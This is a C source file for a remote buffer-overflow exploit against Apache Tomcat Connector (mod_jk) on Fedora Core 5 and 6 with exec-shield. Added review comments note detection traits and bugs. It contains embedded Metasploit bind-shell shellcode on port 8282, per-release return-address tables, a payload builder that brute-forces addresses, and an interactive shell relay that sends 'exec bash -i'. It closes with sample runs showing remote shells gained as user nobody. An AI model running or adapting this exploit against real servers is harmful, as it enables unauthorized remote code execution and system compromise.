
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)


Apache Tomcat Connector (mod_jk) remote overflow exploit for exec-shield-based Fedora Core; includes advanced exploitation techniques for exec-shield.

=============================================================
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
=============================================================

/*
**
** Fedora Core 5,6 (exec-shield) based
** Apache Tomcat Connector (mod_jk) remote overflow exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/22791
** vendor: http://tomcat.apache.org/
**
** eliteboy's exploit (SUSE, Debian, FreeBSD):
** http://www.milw0rm.com/exploits/4093
**
** Nicob <nicob[at]nicob.net>'s exploit (Win32):
** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.inetcop.org
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif

/* Per-release values used as targets[].worker_arg1 (the second word main()
 * writes into the payload); the trailing "(0x2040),(0x201c)" notes are the
 * author's and are not explained anywhere in this file. */
#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */
#define MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */
/* Third and fourth payload words, written unconditionally by main(). */
#define MAP_URI_TO_WORKER_2     0x82828282
#define MAP_URI_TO_WORKER_3     0x08048014

/* parody */
#define HOST_PARAM	"0x82-apache-mod_jk.c" /* Host */ /* also printed by banrl(); a fixed Host: value is an easy log signature */
#define DEFAULT_CMDZ	"uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n" /* sent once by conn_shell() unless -C overrides it */
#define PADDING_1	'A' /* filler byte: main() writes offset-1 of these at the start of the URI */
#define PADDING_2	'B' /* unused in this file */
#define PADDING_3	'C' /* unused in this file */
#define RET_ADDR_INC	(0x2000) /* step added to victim.retaddr on every loop pass in main() */
#define SH_PORT		8282 /* port main() probes after each request; matches LPORT in the payload comment below */

/* Payload sent verbatim as the User-Agent header value (see the sprintf()
 * in main()): 48 bytes of 0x90 followed by a 108-byte Metasploit-generated
 * body, per the embedded generator comment.  Because it travels as a plain
 * header value, the long 0x90 run is directly visible in HTTP traffic. */
char library_shellcode[]=
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	/* linux_ia32_bind -  LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */
	"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
	"\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\xb3\x46\x56\x15"
	"\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\xc0\x76\x32\x2c"
	"\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x50\x4a\x85\x9c"
	"\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x73\x46\x56\x26"
	"\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\xcf\x5f\x3c\x17"
	"\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff";

/*
 * Built-in parameter rows.  main() copies one row into `victim` for -t and
 * lets the individual switches overwrite single fields afterwards.  The
 * field meanings below are taken from how main() and usage() use them.
 */
struct {
	int num;			/* row index; equals the position in the array */
	char *type;			/* description printed by main() ("[*] os:") and usage() */
	int ret_count;			/* number of ret_code copies main() appends to the payload (-c) */
	u_long retaddr;			/* last payload word; main() adds RET_ADDR_INC on every attempt (-r) */
	u_long strcpy_plt;		/* word written after the ret_code run (-s, "strcpy plt address" in usage()) */
	int offset;			/* payload starts with offset-1 PADDING_1 bytes (-o) */
	u_long pop_pop_pop_ret_code;	/* first payload word (-p); the two fields below are derived from it */
	u_long pop_pop_ret_code;	/* 0 in every row; main() sets it to pop_pop_pop_ret_code+1 and only prints it */
	u_long ret_code;		/* 0 in every row; main() sets it to pop_pop_pop_ret_code+3 */
	u_long worker_arg1;		/* second payload word (-m); one of the MAP_URI_TO_WORKER_1_* values */
} targets[] = {
	{0,"Fedora Core release 5 (Bordeaux) - exec-shield\n"
	"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
	"\ttarball install: /usr/local/apache\n"
	"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
	3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_TO_WORKER_1_FC5},

	{1,"Fedora Core release 6 (Zod) - exec-shield\n"
	"\tApache/2.0.49 (Unix) mod_jk/1.2.19\n"
	"\ttarball install: /usr/local/apache\n"
	"\tbinary install: mod_jk-apache-2.0.49-linux-i686.so",
	27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6},

	{2,"Fedora Core release 6 (Zod) - exec-shield\n"
	"\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
	"\ttarball install: /usr/local/apache\n"
	"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
	23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6},

	{3,"Fedora Core release 6 (Zod) - exec-shield\n"
	"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
	"\ttarball install: /usr/local/apache\n"
	"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
	3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_TO_WORKER_1_FC6},
}, victim; /* same anonymous struct type; zeroed and then filled by main()'s option parsing */

/* Forward declarations for the helpers defined after main().
 * NOTE(review): setsock() is also defined after main() but is not declared
 * here, so its calls in main() rely on an implicit int declaration, which
 * C99 and later compilers reject or warn about. */
void re_connt(int sock);
void conn_shell(int sock,char *cmdz);
void usage(char *argv0);
void banrl();

int main(int argc,char *argv[]){
	/*
	 * Entry point.  Option parsing fills the file-scope `victim` record:
	 * -t copies a whole targets[] row, -c/-r/-s/-p/-o/-m set single fields,
	 * -h gives host[:port] (port defaults to "80") and -C replaces the
	 * command string later handed to conn_shell().  The loop that follows
	 * builds one HTTP request per pass, sends it and then probes SH_PORT.
	 * The only ways out are the exit() calls in usage(), re_connt() and the
	 * SH_PORT-success branch, so main() never returns normally.
	 *
	 * What the request looks like on the wire (from the code below): the URI
	 * is a run of offset-1 PADDING_1 ('A') bytes followed by raw address
	 * words (only bytes 0x09..0x0d are percent-encoded), and the User-Agent
	 * header carries library_shellcode verbatim (48 x 0x90 then the payload).
	 * Oversized URIs of repeated 'A' and a User-Agent made of 0x90 bytes are
	 * the observable traits a defender would key on in access logs or an
	 * HTTP-aware IDS.
	 *
	 * NOTE(review): <string.h> is never included, so memset/memcpy/strtok/
	 * strlen are implicitly declared in this file; setsock() is likewise used
	 * before any declaration.
	 */
	int sock;
	int i=0,j=0,l=0,b=0;	/* b is assigned in the for() header below but never read */
	unsigned char do_ex[8192];	/* raw payload: padding followed by address words */
	unsigned char ex_buf[8192*2];	/* complete HTTP request; each do_ex byte may expand to 3 when encoded */
	unsigned char sm_buf[4];	/* scratch for one "%02x" conversion (2 digits + NUL) */
	char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ;

	memset(&victim,0,sizeof(victim));	/* every field starts at 0; the check after getopt() relies on that */
	banrl();
	while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){
		switch(i){
			case 'h':
				/* strtok() splits optarg in place; a missing ":port" part means port 80 */
				hostp=(char *)strtok(optarg,":");
				if((portp=(char *)strtok(NULL,":"))==NULL)
					portp="80";
				break;
			case 't':
				/* NOTE(review): atoi() yields int, sizeof() yields size_t, so a
				 * negative -t value converts to a large unsigned, passes this
				 * check and makes the memcpy() below read targets[] out of bounds. */
				if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){
					usage(argv[0]);
					return -1;	/* unreachable: usage() calls exit() */
				}
				memcpy(&victim,&targets[atoi(optarg)],sizeof(victim));
				break;
			case 'c':
				victim.ret_count=atoi(optarg);
				break;
			case 'r':
				victim.retaddr=strtoul(optarg,NULL,16);	/* -r/-s/-p/-m are parsed as hex, no error check */
				break;
			case 's':
				victim.strcpy_plt=strtoul(optarg,NULL,16);
				break;
			case 'p':
				victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16);
				break;
			case 'o':
				victim.offset=atoi(optarg);
				break;
			case 'm':
				victim.worker_arg1=strtoul(optarg,NULL,16);
				break;
			case 'C':
				cmdz=optarg;
				break;
			default:
				usage(argv[0]);
				break;	/* unreachable: usage() calls exit() */
		}
	}
	/* Every field must be non-zero: either -t supplied a full row, or each of
	 * -c/-r/-s/-o/-p/-m was given; -h is mandatory in both cases. */
	if(!victim.ret_count||!victim.retaddr||!victim.strcpy_plt||!victim.offset||!victim.pop_pop_pop_ret_code||!victim.worker_arg1||!hostp||!portp){
		usage(argv[0]);
		return -1;	/* unreachable: usage() calls exit() */
	}

	/* Derived values: pop_pop_ret_code is only ever printed; ret_code is the
	 * one written into the payload. */
	victim.pop_pop_ret_code=victim.pop_pop_pop_ret_code+1;
	victim.ret_code=victim.pop_pop_pop_ret_code+3;

	/* NOTE(review): %p expects void *, but these fields are u_long; the calls
	 * are format-mismatched and print as intended only where both have the
	 * same size and calling convention (the 32-bit hosts this was written on). */
	printf("[*] os: %s\n\n",victim.type);
	printf("[*] host: %s\n",hostp);
	printf("[*] port: %s\n",portp);
	printf("[*] count: %d\n",victim.ret_count);
	printf("[*] [email protected]: %p\n",victim.strcpy_plt);
	printf("[*] offset: %d\n",victim.offset);
	printf("[*] pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code);
	printf("[*] pop_pop_ret_code: %p\n",victim.pop_pop_ret_code);
	printf("[*] ret_code: %p\n",victim.ret_code);
	printf("[*] map_uri_to_worker() arg1: %p\n",victim.worker_arg1);
	printf("[*] start retaddr: %p\n\n",victim.retaddr);

	putchar(';');
	srand(getpid());	/* rand() only drives the cosmetic 'P'/'p' progress marker */

	/* Unbounded retry loop: retaddr advances by RET_ADDR_INC each pass and
	 * nothing ever stops it except exit() below or inside re_connt(). */
	for(b=0;;victim.retaddr+=RET_ADDR_INC){

		putchar((rand()%2)? 'P':'p');
		fflush(stdout);

		usleep(100000);	/* 100 ms between attempts */

		memset((char *)do_ex,0,sizeof(do_ex));
		memset((char *)ex_buf,0,sizeof(ex_buf));
		memset((char *)sm_buf,0,sizeof(sm_buf));

/* Store `src` as a `long` at dest[index] through an unaligned cast and
 * advance index by 4.  Only coherent where sizeof(long)==4 (the 32-bit
 * targets above); on an LP64 host the store is 8 bytes wide while index
 * moves 4, so consecutive stores overlap.  NOTE(review): an identifier with
 * two leading underscores is reserved for the implementation. */
#define __GOGOSSING(dest,index,src){\
	*(long *)&dest[index]=src;\
	index+=4;\
}
		/* offset-1 filler bytes; sprintf() also drops a NUL after each one,
		 * harmless because do_ex was zeroed.  NOTE(review): offset comes from
		 * -o or the target row and is never checked against sizeof(do_ex). */
		for(i=0;i<victim.offset-1;i++){
			sprintf(do_ex+i,"%c",PADDING_1);
		}
		/* Fixed word sequence: gadget address, worker_arg1, two constants ... */
		__GOGOSSING(do_ex,i,victim.pop_pop_pop_ret_code);
		__GOGOSSING(do_ex,i,victim.worker_arg1); /* pop */
		__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_2); /* pop */
		__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_3); /* pop */

		/* ... ret_count copies of ret_code ... */
		for(j=0;j<victim.ret_count;j++){
			__GOGOSSING(do_ex,i,victim.ret_code);
		}

		/* ... then strcpy_plt, ret_code and the per-attempt retaddr; i is now the payload length */
		__GOGOSSING(do_ex,i,victim.strcpy_plt); /* ret */
		__GOGOSSING(do_ex,i,victim.ret_code);
		__GOGOSSING(do_ex,i,victim.retaddr); /* library */

		/* Copy the payload into the URI.  Only 0x09..0x0d are percent-encoded;
		 * every other byte, including 0x00, is copied raw.  Because the length
		 * is recomputed with strlen() afterwards and send() uses strlen() too,
		 * a 0x00 byte in do_ex silently truncates the request at that point.
		 * NOTE(review): worst-case expansion is 3x, so a large offset can run
		 * past sizeof(ex_buf); there is no bound check on l. */
		sprintf(ex_buf,"GET /");
		l=strlen(ex_buf);
		for(j=0;j<i;j++){
			if((do_ex[j]>0x08)&&(do_ex[j]<0x0e)){
				memset((char *)sm_buf,0,sizeof(sm_buf));
				sprintf(sm_buf,"%02x",do_ex[j]);
				ex_buf[l++]='%';
				ex_buf[l++]=sm_buf[0];
				ex_buf[l++]=sm_buf[1];
			}
			else ex_buf[l++]=do_ex[j];
		}
		l=strlen(ex_buf);
		/* Request-line tail plus headers; library_shellcode becomes the
		 * User-Agent value and HOST_PARAM the Host value.  Unbounded sprintf(). */
		sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM);
		sock=setsock(hostp,atoi(portp));	/* setsock() is defined later and undeclared here */
		re_connt(sock);	/* exits the program if the connect failed */
		send(sock,ex_buf,strlen(ex_buf),0);	/* return value unchecked; the response is never read */
		close(sock);

		/* Probe SH_PORT; any successful connect is taken as success.
		 * NOTE(review): setsock() leaks its socket on connect() failure, so
		 * every failed probe here costs one descriptor. */
		sock=setsock(hostp,SH_PORT);
		if(sock!=-1){
			printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, [email protected]=%p,\n"
				"pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr,
				victim.strcpy_plt,victim.pop_pop_pop_ret_code,victim.worker_arg1);
			conn_shell(sock,cmdz);	/* never returns normally */
			exit(-1);
		}
	}
}

int setsock(char *host,int port)
{
	/*
	 * Resolve `host` and open a TCP connection to `port`.
	 * Returns the connected descriptor, or -1 if gethostbyname(), socket() or
	 * connect() fails.  main() calls it for the HTTP port (then hands the
	 * result to re_connt()) and once per loop pass for SH_PORT.
	 *
	 * NOTE(review): on connect() failure the descriptor from socket() is
	 * abandoned without close(), so each failed call leaks one fd; main()
	 * expects the SH_PORT attempt to fail on most passes, so a long run
	 * accumulates leaked descriptors.  socket()/connect() are compared with
	 * EOF rather than < 0, and connect() has no timeout, so an unresponsive
	 * host blocks here indefinitely.  gethostbyname() is the obsolete,
	 * non-reentrant resolver interface.
	 */
	int sock;
	struct hostent *he;
	struct sockaddr_in x82_addr;
 
	if((he=gethostbyname(host))==NULL)
	{
		return -1;
	}
	if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
	{
		return -1;
	}
	x82_addr.sin_family=AF_INET;
	x82_addr.sin_port=htons(port);
	x82_addr.sin_addr=*((struct in_addr *)he->h_addr);	/* h_addr: legacy alias for h_addr_list[0] */
	bzero(&(x82_addr.sin_zero),8);
 
	if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
	{
		return -1;	/* sock is not closed on this path */
	}
	return(sock);
}

void re_connt(int sock)
{
	/*
	 * Guard for setsock()'s result: a valid descriptor passes through
	 * untouched; -1 prints the errno text via perror() and terminates the
	 * program with exit(-1).
	 */
	if(sock!=-1)
		return;
	fputs("\n[-] ",stdout);
	fflush(stdout);
	perror("connect()");
	fputs("[-] exploit failed.\n",stdout);
	exit(-1);
}

void conn_shell(int sock,char *cmdz)
{
	/*
	 * Interactive relay between the local terminal and `sock`: sends `cmdz`
	 * once, then forwards socket data to stdout and stdin data to the socket
	 * until the peer closes (read() <= 0 -> exit(0)).  Never returns normally.
	 *
	 * NOTE(review): rbuf holds 1024 bytes and both read() calls may fill all
	 * 1024, after which rbuf[pckt]=0 writes one byte past the end.  The
	 * return values of select(), send() and write() are unchecked, and EOF
	 * on stdin (pckt==0) is ignored, so once stdin is closed select() will
	 * presumably keep reporting it readable and the loop spins.
	 */
	int pckt;
	char rbuf[1024];
	fd_set rset;
	memset((char *)rbuf,0,1024);
	send(sock,cmdz,strlen(cmdz),0);

	while(1)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(sock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(sock+1,&rset,NULL,NULL,NULL);	/* blocks until either side is readable */
	
		if(FD_ISSET(sock,&rset))
		{
			pckt=read(sock,rbuf,1024);
			if(pckt<=0)
			{
				exit(0);	/* peer closed or read error: end the program */
			}
			rbuf[pckt]=0;	/* out of bounds when pckt==1024 */
			printf("%s",rbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			pckt=read(STDIN_FILENO,rbuf,1024);
			if(pckt>0)
			{
				rbuf[pckt]=0;	/* out of bounds when pckt==1024 */
				write(sock,rbuf,pckt);
			}
		}
	}
	return;
}

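void usage(char *argv0){
	/*
	 * Print the option summary and the built-in target table, then exit(-1).
	 * argv0 is echoed into the "Usage:" and "Example:" lines.  Never returns,
	 * so the `return -1` statements after its calls in main() are unreachable.
	 */
	static const char *const switch_help[]={
		"  -h host[:port]\tHost\n",
		"  -t number\t\tTarget id.\n",
		"  -c ret_count\t\tret count\n",
		"  -r retaddr\t\tstart library retaddr\n",
		"  -s [email protected]\t\tstrcpy plt address\n",
		"  -p pop3/ret\t\tpop3/ret address\n",
		"  -o offset\t\tOffset\n",
		"  -m worker_arg1\tmap_uri_to_worker() arg1\n",
		"  -C cmdz\t\tCommands\n",
	};
	const size_t nswitches=sizeof(switch_help)/sizeof(switch_help[0]);
	const size_t ntargets=sizeof(targets)/sizeof(victim);
	size_t k;

	printf("Usage: %s <-switches> -h host[:80]\n",argv0);
	for(k=0;k<nswitches;k++)
		fputs(switch_help[k],stdout);
	printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0);
	fputs("\n--- --- - Potential targets list - --- ---- ------- ------------\n",stdout);
	fputs(" ID / Return addr / Target specification\n",stdout);
	for(k=0;k<ntargets;k++){
		/* retaddr is u_long but %08x takes unsigned int; the cast keeps the
		 * call well-defined on LP64 hosts (all table values fit in 32 bits). */
		printf("% 3d / 0x%08x /\n\t%s\n\n",(int)k,(unsigned int)targets[k].retaddr,targets[k].type);
	}
	exit(-1);
}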

void banrl(){
	/* Banner: fixed tag, five tabs, HOST_PARAM, then a blank line. */
	fputs("INetCop(c) Security\t\t\t\t\t",stdout);
	fputs(HOST_PARAM,stdout);
	fputs("\n\n",stdout);
}

/*
**
** Fedora core 5 exploit:
** --
** $ ./0x82-apache-mod_jk -t 0 -h fc5.inetcop.org
** INetCop(c) Security                                     0x82-apache-mod_jk.c
** 
** [*] os: Fedora Core release 5 (Bordeaux) - exec-shield
**         Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
**         tarball install: /usr/local/apache
**         tarball install: tomcat-connectors-1.2.xx-src.tar.gz
** 
** [*] host: fc5.inetcop.org
** [*] port: 80
** [*] count: 3
** [*] [email protected]: 0x8060c80
** [*] offset: 4112
** [*] pop_pop_pop_ret_code: 0x8060dc4
** [*] pop_pop_ret_code: 0x8060dc5
** [*] ret_code: 0x8060dc7
** [*] map_uri_to_worker() arg1: 0x80474bc
** [*] start retaddr: 0x100104
** 
** ;PPPpppPpppPpppPPpPpPPPppPppPPppPPpPPpPPPPPP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x154104, [email protected]=0x8060c80,
** pop3/ret=0x8060dc4, worker_arg1=0x80474bc
** 
** Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
** Fedora core 6 exploit:
** --
** $ ./0x82-apache-mod_jk -t 3 -h fc6.inetcop.org
** INetCop(c) Security                                     0x82-apache-mod_jk.c
** 
** [*] os: Fedora Core release 6 (Zod) - exec-shield
**         Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
**         tarball install: /usr/local/apache
**         tarball install: tomcat-connectors-1.2.xx-src.tar.gz
** 
** [*] host: fc6.inetcop.org
** [*] port: 80
** [*] count: 3
** [*] [email protected]: 0x8060164
** [*] offset: 4112
** [*] pop_pop_pop_ret_code: 0x80614d4
** [*] pop_pop_ret_code: 0x80614d5
** [*] ret_code: 0x80614d7
** [*] map_uri_to_worker() arg1: 0x80476a4
** [*] start retaddr: 0x100104
** 
** ;pPpPppppPpppPppPPPpPPpPppPpPpPPpPPPPPpP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x14c104, [email protected]=0x8060164,
** pop3/ret=0x80614d4, worker_arg1=0x80476a4
** 
** Linux localhost 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
*/

/* eox */



